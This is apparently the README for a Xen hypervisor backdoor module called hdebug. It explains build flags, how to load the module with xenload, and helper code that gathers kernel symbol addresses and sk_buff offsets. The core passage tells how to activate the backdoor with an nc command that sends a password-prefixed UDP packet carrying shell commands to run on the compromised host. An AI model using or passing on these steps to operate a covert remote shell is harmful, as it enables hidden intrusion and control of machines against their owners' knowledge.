The -DCONFIG_X86_PAE in the Makefile should be removed if Xen runs in
non-PAE mode (which is unlikely).
The backdoor is activated by sending appropriate UDP packet, e.g
printf "\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbbshell commands to execute\x00" | \
	nc -u your.ip.address any_port
The first eight bytes are the password, checked in
hdebug-xen.c:parse_data().

If your NIC uses NAPI, load hdebug.o with
xenload hdebug.o scratch0=allocated_buf use_napi=1

The code in the "prefixes" directory (along with the kallsyms.sh script) is
meant to collect various function addresses. The code in skbuff_offset
(compile it manually with proper kernel headers) provides offsets to struct
sk_buff.
